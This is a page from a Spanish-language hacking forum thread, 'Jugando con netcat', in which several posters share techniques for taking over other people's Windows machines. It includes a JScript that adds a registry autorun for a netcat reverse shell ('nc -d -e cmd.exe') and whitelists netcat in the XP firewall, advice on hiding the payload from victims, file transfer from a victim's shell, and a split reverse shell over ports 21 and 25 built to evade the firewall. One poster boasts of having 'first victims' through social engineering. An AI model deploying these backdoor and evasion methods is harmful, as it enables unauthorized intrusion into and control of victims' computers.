elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
08 Septiembre 2008, 12:15  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderador: zhyzura)
| | | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 37 Ir Abajo Imprimir
Autor Tema: Jugando con netcat  (Leído 55476 veces)
EvilGoblin

Desconectado Desconectado

Mensajes: 826


LAIN IS LAIN


Ver Perfil
Re: Jugando con netcat
« Respuesta #30 en: 29 Marzo 2007, 16:42 »

ME ENCANTO! =D..

yo tambien tenia el problema con HOST NO FOUND

y antes con el router zyxel 600 para configurar la entrada del puerto y redireccionarlo a mi IP =).

pero fue resuelto con google ^^

MUCHAS GRACIAS POR COMPARTIR LA INFORMACION =D

en esta gran comunidad =D

^^ y saludos al Staff =P
En línea



Experimental Serials Lain
WHK

Desconectado Desconectado

Mensajes: 812


+-=[Yan]=-+


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #31 en: 29 Marzo 2007, 21:43 »

En este momento estoy haciendo las imagenes y el video de como ver el escritorio de la victima despues de haber tomado la shell con netcat usando el realvnc4 (no detectado por lo antivirus) pero no se si ponerlo acá o hacer un nuevo tema... mientras lo hago diganme ustedes como lo quieren.
Ya he hecho el video como 4 veces pero cuando voy en la mitad se corta la luz por lo del dia del combatiente aca en Chile XD. PERO POR USTEDES LO HARIA CIENMIL VECES XD

Att. Yan.
Unilola Software.
En línea

-The Hacktivism is not a crimen.
- Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
- Richard Stallman: "GNU (GNU No es Unix)".
- Mi web: https://sourceforge.net/projects/whkfilemanager/ - http://www.jccharry.com/ (Actualizando)
fitu

Desconectado Desconectado

Mensajes: 205


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #32 en: 29 Marzo 2007, 22:53 »

para mi deberia ir en otro post... cuando lo tengas avisa ! xD ya pude hacerlo y me funciono ya tengo mis primeras victimas .... ingeniria social sirve demasiado :P
En línea
silverhack
Colaborador

Desconectado Desconectado

Mensajes: 1.743



Ver Perfil
Re: Jugando con netcat
« Respuesta #33 en: 29 Marzo 2007, 23:30 »

Me ha gustado mucho. Enhorabuena! ;)
En línea

No admitir corrección ni consejo sobre la propia obra es pedantería.

Jean de la Bruyere
WHK

Desconectado Desconectado

Mensajes: 812


+-=[Yan]=-+


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #34 en: 30 Marzo 2007, 01:38 »

JUGANDO CON NETCAT
               IV



Como convertir a netcat en un chat.

Bueno... esto es lo mas facil del mundo y no requiere partirse la cabeza para poder hacerlo. Con este metodo puedes crear aplicaciones de chat propio muy caseros. (Una forma mas de utilizar netcat.)

Uno deve ponerse de servidor ejecutando lo siguiente:

nc -L -p (puerto) -vv

y la otra persona como cliente ejecutará lo siguiente:

nc (ip del servidor) (puerto)

y ambos podrán interactuar sin la necesidad de ejecutarse comandos uno al otro ni nada por el estilo...
Esto es muy muy muy basico y sencillo, ademas puedes incorporarlo a algun proyecto hecho en visual basic para crear tu propio chat con emoticones y una buena apariencia grafica.

Este articulo no es tan importante como los dos primeros pero como su titulo india "jugando con netcat" esta es una de las muchas formas de sacarle el jugo.



Ahora voy a explicar lo que pasó acá:

nc -L -p (puerto) -vv Dijimos que -L: seguiremos conectados Aunque nuestro amigo sedesconecte... asi podremos seguir en espera de otras personas o del mismo. -p: es el puerto que usamos para comunicarnos. -vv:Very Verbose. o sea que mostraremos los mensajes  que nos estan llegando.
Ahora ustedes dicen "porque no podemos ejecutar cosas como en la primera parte de jugando con netcat???" muy simple... porque omitimos el comando: -e cmd.exe el cual nos permitía escuchar y manejar lo que hacia la consola de comandos, pero tambien puedes hacerlo con otras cosas, por ejemnplo un bat que te buelque un contenido de un texto... asi solo ves los logs de algo cuando llamas a un server o enviar reportes de algo cada cierto tiempo a alguna parte o transferir mensajes en modo pgp:

@echo off
Echo enviando mensaje:
type pgp.txt
Echo.
Echo Fin. Cerrando coneccin.
exit


y luego haces un : nc -d -e reporte.bat ip puerto o nc -L -d -e reporte.bat -p 25 .

Señores!... que quiero demostrar con este mini tutorial... que el netcat sirve para muchas cosas y no tan solo para tomar una shell... el netcat es una herramienta GNU y no un troyano.

El video explicativo (si esque no entendieron) pueden bajarlo como siempre desde acá: http://512.iespana.es/nc

Att Yan.
Unilola Software.
« Última modificación: 29 Diciembre 2007, 18:44 por WHK » En línea

-The Hacktivism is not a crimen.
- Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
- Richard Stallman: "GNU (GNU No es Unix)".
- Mi web: https://sourceforge.net/projects/whkfilemanager/ - http://www.jccharry.com/ (Actualizando)
Morphmitrio

Desconectado Desconectado

Mensajes: 103


La verdad esta allí ¿La ves? entre 0 y 1


Ver Perfil
Re: Jugando con netcat
« Respuesta #35 en: 31 Marzo 2007, 01:18 »

Woo excelent Amigo de verdad muy bueno... me gusto mucho la combinacion con el rar yo hacia algo parecido por Ftp le enterraba el nc en la system32 lo ponia a la escucha pero tu método es mas sencllo jeje Grax por compartir la información, pero tengo rollos con el envio de mensaje una duda a mí los enlases de los videos y las herramientas no me sirven pss dice

La página solicitada no existe o aún no ha sido creada..

de todas formas desde acá te explicaste muy bien lo demas es config internas 541UD05
En línea

Morphmitrio

Desconectado Desconectado

Mensajes: 103


La verdad esta allí ¿La ves? entre 0 y 1


Ver Perfil
Re: Jugando con netcat
« Respuesta #36 en: 31 Marzo 2007, 02:04 »

jeje ya pude bajar los videos tuve q usar mi Proxy q lala muxas pag de descargas excluyen a mi país. Siempre tengo ese problema  :-\ 
En línea

WHK

Desconectado Desconectado

Mensajes: 812


+-=[Yan]=-+


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #37 en: 31 Marzo 2007, 02:11 »

Si abres el enlace directamente del archivo del video sin hacerlo desde la pagina entonces te dice que el enlace está roto... trata de pinchar el link directamente desde la pagina sin abrir ninguna mas. Yo acabo de revisarla y si se pueden bajar aún. Casi me dió un infarto al pensar que iespana también cascaba por exeso de trafico pero no es asi como el de geocities, aún hay para rato  ;D
Y otra cosa... yo antes tambien lo hacia en system32 pero no todos tienen derecho de sobreescritura sobre esa carpeta por lo cual el winrar da un error de ruta y desvela el contenido malicioso y no queremos que eso pase asi que elegí un directorio en que todos puedan tener acceso sin importar que tipo de cuentas usen : %homepat% . también antiguamente hacia las entradas de registro con archivos de extención *.js y se ejecutaban con scripts como este:

var WSHShell = WScript.CreateObject("WScript.Shell");WSHShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\nc.exe", "C:\\WINDOWS\\system32\\nc -d -e cmd.exe ip puerto");
WSHShell.RegWrite("HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\nc.exe", "C:\\WINDOWS\\system32\\nc.exe");
function Welcome()
{if (intDoIt == vbCancel) {
}
}


y de esta forma anulamos el cortafuegos de windows XP con SP2 y ademas agregamos una entrada de autoarranque al registro del sistema y a diferencia del bat... este no se ve ni si quiera el pestañazo del DOS asi que es mas silencioso. Pero el problema estaba en que si alguien usaba un compilador web como el dreamweaver u otro similar donde asociaran estos archivos, ps en ves de agregar las entradas de registro... se abria el programa dreamweaver u otro mas. por eso lo reemplazé por un bat para que todos pudieran comprender como se hacia esta entrada de registro y pudieran hechar a volar la imaginación ya que nada me hubiera costado hacer un programa en c que haga las entradas de registro y ejecutara netcat si que se vea nada pero muchos hubiern quedado sin saber como hacerlo ya que no todos saben programar y este tutorial esta hecho con la intención del que no sabe nada... pueda aprender a usar netcat de diferentes formas y no tan solo para usarlo de troyano como muchos creen.  ;)
En línea

-The Hacktivism is not a crimen.
- Dios nos hace libres en el mundo real y el Hacking nos hace libres en el mundo de la informática.
- Richard Stallman: "GNU (GNU No es Unix)".
- Mi web: https://sourceforge.net/projects/whkfilemanager/ - http://www.jccharry.com/ (Actualizando)
Alfai

Desconectado Desconectado

Mensajes: 7



Ver Perfil
Re: Jugando con netcat
« Respuesta #38 en: 31 Marzo 2007, 04:46 »

Muy bueno, la verdad, no sabía todo lo que se podía hacer con esta herramienta

saludos
Alfai
En línea
NewLog

Desconectado Desconectado

Mensajes: 315



Ver Perfil
Re: Jugando con netcat
« Respuesta #39 en: 01 Abril 2007, 16:28 »

Ufff, dices en algunos posts que no se ah de saber C, pero sí que se ha de controlar un poco la programación batch (era así, no? xD).

El caso, no tenia ni idea que el netcat tuviera tantas utilidades. Mr Hobbit se lo curró programándolo ^^

Mejor no crees un hilo nuevo! Aquí ya estaría bien tu nuevo tutoo ^^

Merci :)
En línea
octalh

Desconectado Desconectado

Mensajes: 533


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #40 en: 01 Abril 2007, 22:49 »

Bueno aqui esta mi aportacion XD  ;D

JUGANDO CON NETCAT
V

NETCAT PARA TRANSFERENCIA DE ARCHIVOS
no tendran que usar FTP ni TFTP una ves teniendo NC  en la victima


Lo primero sera prepararnos como servidor [ atacante ] para que el cliente [ victima ] posteriormente conecte a nosotros y descarge el file

sintaxis

Código:
nc -l -p PUERTO < FILE



Ahora desde la shell de la victima conectaremos a nosotros y recibiremos el file

sintaxis:

Código:
nc IP PUERTO > FILE



Ahora esperaremos un momento [ parecera que se colgo la shell ] pero no XD ... para comprobar que ya se descargo realizamos un dir en el servidor destino



como pueden ver el tamaño es de 700.416 bytes por lo tanto el archivo a sido descargado con exito

ahora solo queda precionar CTRL+C en la shell del cliente para detener el comando

bueno eso es todo salu2 y suerte

bytes..
« Última modificación: 01 Abril 2007, 22:51 por octalh » En línea

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/



http://www.aztekmindz.org
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #41 en: 01 Abril 2007, 23:11 »

En vez de
Código:
nc -l -p PUERTO < FILE

tambien podemos usar un :

Código:
type archivo | nc IP PUERTO
si la vicitma tiene un puerto en escucha, o si en puerto en escucha es el nuestro:

Código:
type archivo | nc -L -p PUERTO

Prefiero usar el metodo de conectarte... usar puerto 21 que el firewall SP2 no cantara....
En línea

octalh

Desconectado Desconectado

Mensajes: 533


"El sueño de la razón produce monstruos"


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #42 en: 01 Abril 2007, 23:16 »

jaja nunca se me ocurrio hacerlo en modo pipeado

buen tip neox  ;D
En línea

「エステバン 」
ReCoLeCtAr DaToS eS SoLo El PriMeR pASo A la SaBiDuRIa
PeRo CoMpArTiR DaToS eS eL pRiMeR pAsO a La CoMuNidAD...

http://www.octalh.mx.gs/



http://www.aztekmindz.org
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #43 en: 01 Abril 2007, 23:29 »

Gracias.

A esto le falta un " Jugando con el Netcat VI ", shell pipelada o volteada...

Voy a ponerme a hacerlo.
En línea

ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #44 en: 01 Abril 2007, 23:44 »

Jugando con Netcat VI


Shell volteada o pipelada:


Bien hasta ahora nosotros conocemos la tecnica de la shell directa e inversa, probemos la inversa, nos las ingeniamos para que la victima deje un puerto a la escucha...




Este comando camuflado con el metodo del iexplore tendria el mismo efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos podemos conectar a la victima...



EL firewall de XP SP2 detecta que actua como un servidor y lo bloquea!!

Asi, que que podemos hacer ??, pues una shell pipelada o volteada.

Esta técnica se basa en que la mayoria de los firewall aceptan la entrada de datos por el puerto 21 y la salida de estos por el puerto 25, de esta manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la lista de excepciones.

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21
  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.




Y la víctima debe ejecutar:
 
nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25




Explicacion:

Usamos " pipes ", esto es basicamente un metodo para transmitir datos entre programas, nos conectamos al puerto 21 del atacante, todo lo que recibamos por ese puerto será redirigido a cmd.exe usando " | ", el resultado que dé cmd.exe será a la vez redirigido a la conexion que tenemos con el puerto 25 de la victima.

Por ese motivo las ordenes o comandos debemos escribirlos en la ventana en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto 25.

Por que usamos el puerto 21 (FTP) ?

Pues por que el firewall de XP SP2 admite por defecto la entrada de datos por dicho puertos, como tambien la admite por el puerto 80, etc...

Por que usamos el puerto 25 (SMTP) ?

Pues basicamente lo mismo que lo anterior, pero en este caso lo permitido es la salida de datos.



Entonces en la nos saldra esto:





En la ventana donde escuchamos el puerto 21 escribiremos los comandos y en la que usamos el puerto 25 veremos el resultado...

Y todo esto sin que el firewall no diga ni pio!!, la unica forma de que nos funcione un Netcatt troyanizado usando unicamente el Netcat para esquivar el firewall...

« Última modificación: 02 Abril 2007, 23:16 por ne0x » En línea

Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 37 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC